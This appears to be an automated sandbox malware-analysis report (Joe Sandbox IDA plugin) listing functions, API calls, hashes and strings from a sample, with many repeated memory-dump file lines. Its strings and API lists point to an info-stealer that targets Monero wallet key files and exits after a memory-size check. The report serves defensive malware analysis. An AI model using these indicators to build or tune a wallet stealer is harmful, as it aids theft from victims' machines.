Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: 690da67d5f222a61ec1b7e68868fb551af3d5f06e4e4a46d348fbab67356fae2
Instruction ID: 6d52ff76d37b53a67a2940aebf1bf5ec090f40a33e5bdfc5afd630c6b745e609
Opcode Fuzzy Hash: 690da67d5f222a61ec1b7e68868fb551af3d5f06e4e4a46d348fbab67356fae2
Instruction Fuzzy Hash: C93184B290020857DB16FBB0DC85EED737CAB58701F404589BB15BA091EE74978DCFA1

Function 00341220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0034123E
__aulldiv.LIBCMT ref: 00341258
__aulldiv.LIBCMT ref: 00341266
ExitProcess.KERNEL32 ref: 00341294

Strings

@, xrefs: 00341233

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: eb4062b739788f81ea8bb6a95ee7aa3cb2f2a0cdba3446504afcdd145f4a79e9
Instruction ID: 89616c3a714f514f83bb070e44c8263ae8ea1c813480a7f38f523c4c8cb58eed
Opcode Fuzzy Hash: eb4062b739788f81ea8bb6a95ee7aa3cb2f2a0cdba3446504afcdd145f4a79e9
Instruction Fuzzy Hash: 840162B0D54308BAEB10DBD4DC49B9EB7B8AB14701F208445FB05FA1C0D7B465858B59

Function 003570D0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 140COMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

memset.MSVCRT ref: 0035716A

Strings

s5, xrefs: 003572AE, 00357179, 0035717C
65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0035718C
s5, xrefs: 00357111

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpymemset
String ID: s5$s5$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 4047604823-867831089
Opcode ID: b76c9a0eec90fa4d4ea1c809456337e3776bcc4a6ca6f2232b5e94886256f00f
Instruction ID: b38fe30d22cf5260be25ff79c51a200fc7d47a1c75c396fea0ec0783720d81e1
Opcode Fuzzy Hash: b76c9a0eec90fa4d4ea1c809456337e3776bcc4a6ca6f2232b5e94886256f00f
Instruction Fuzzy Hash: 9251AEB0C042089BDB15EB90EC96FEEB774AF04305F1045A8EA067B1A1EB742E8CDF54

Function 00357E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357E37
RtlAllocateHeap.NTDLL(00000000), ref: 00357E3E
RegOpenKeyExA.KERNEL32(80000002,0126BE48,00000000,00020119,?), ref: 00357E5E
RegQueryValueExA.KERNEL32(?,0127DC50,00000000,00000000,000000FF,000000FF), ref: 00357E7F
RegCloseKey.ADVAPI32(?), ref: 00357E92

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: dda9cb27b4c8513b70f4b7c0fc4ed869ef146fb3369ed2c6ce76d4949e3573ae
Instruction ID: 38aa2d2837a1247cfd1439d7271eefffb1cf5691b50c57322996df3599613793
Opcode Fuzzy Hash: dda9cb27b4c8513b70f4b7c0fc4ed869ef146fb3369ed2c6ce76d4949e3573ae
Instruction Fuzzy Hash: 04115EB1A44205EBEB14CF94ED4AFBBBBBCEB04B11F10415AFE05B7690D77458089BA1

Function 003412A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 003412B4
RtlAllocateHeap.NTDLL(00000000), ref: 003412BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 003412D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003412F5
RegCloseKey.ADVAPI32(?), ref: 003412FF

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 263cabebc37dfa5a62d0f570fc77d643f1863c0bab09f675c6e3dd5ee605689a
Instruction ID: 39670efc6b9468fc9d4759eb28d16fd2ec416dac2ccdaf0acbdafa9cebdac5c4
Opcode Fuzzy Hash: 263cabebc37dfa5a62d0f570fc77d643f1863c0bab09f675c6e3dd5ee605689a
Instruction Fuzzy Hash: 8B0136B5A40208BBEB00DFD0DC49FAEB7B8EB48701F008155FE05E7280D6749A059F51

Function 0034A0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(01278F70,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 0034A0BD
LoadLibraryA.KERNEL32(0127DC90), ref: 0034A146

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A820: lstrlen.KERNEL32(00344F05,?,?,00344F05,00360DDE), ref: 0035A82B
Part of subcall function 0035A820: lstrcpy.KERNEL32(00360DDE,00000000), ref: 0035A885

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01279050,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

SetEnvironmentVariableA.KERNEL32(01278F70,00000000,00000000,?,003612D8,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00360AFE), ref: 0034A132

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0034A0B2, 0034A0C6, 0034A0DC

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-3463377506
Opcode ID: e6489202c81ed7be0ae732c29adfd6d738679699846f9bea6aab478b8136a73c
Instruction ID: ac1ce31f385b7c3a123e06e3ba3502b3ce8605f831ea7bef61f07236f88a04f3
Opcode Fuzzy Hash: e6489202c81ed7be0ae732c29adfd6d738679699846f9bea6aab478b8136a73c
Instruction Fuzzy Hash: 124184B1D015049FE706DFA5EC45EA937B4BB24301F14151AFD05BB2A4EB34694CEB53

Function 0034A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01279050,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Part of subcall function 00358B60: GetSystemTime.KERNEL32(00360E1A,0127A730,003605AE,?,?,003413F9,?,0000001A,00360E1A,00000000,?,01279050,?,\Monero\wallet.keys,00360E17), ref: 00358B86

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0034A2E1
lstrlen.KERNEL32(00000000,00000000), ref: 0034A3FF
lstrlen.KERNEL32(00000000), ref: 0034A6BC

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

DeleteFileA.KERNEL32(00000000), ref: 0034A743

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 0c9184ec9debefb25d108a202f04f7edf55dd4aebc4a78b169cdbdeaacf5e77f
Instruction ID: 5ac4cf1df55c54c7ab0e750f2977da6f910d2d9658ef3d2b9518c3554e56dcc2
Opcode Fuzzy Hash: 0c9184ec9debefb25d108a202f04f7edf55dd4aebc4a78b169cdbdeaacf5e77f
Instruction Fuzzy Hash: C1E1E6728105189ADB06FBA4DC92DEE7738BF14301F508259F9177A0A1EF346A4DEB62

Function 0034D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01279050,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Part of subcall function 00358B60: GetSystemTime.KERNEL32(00360E1A,0127A730,003605AE,?,?,003413F9,?,0000001A,00360E1A,00000000,?,01279050,?,\Monero\wallet.keys,00360E17), ref: 00358B86

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0034D801
lstrlen.KERNEL32(00000000), ref: 0034D99F
lstrlen.KERNEL32(00000000), ref: 0034D9B3
DeleteFileA.KERNEL32(00000000), ref: 0034DA32

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
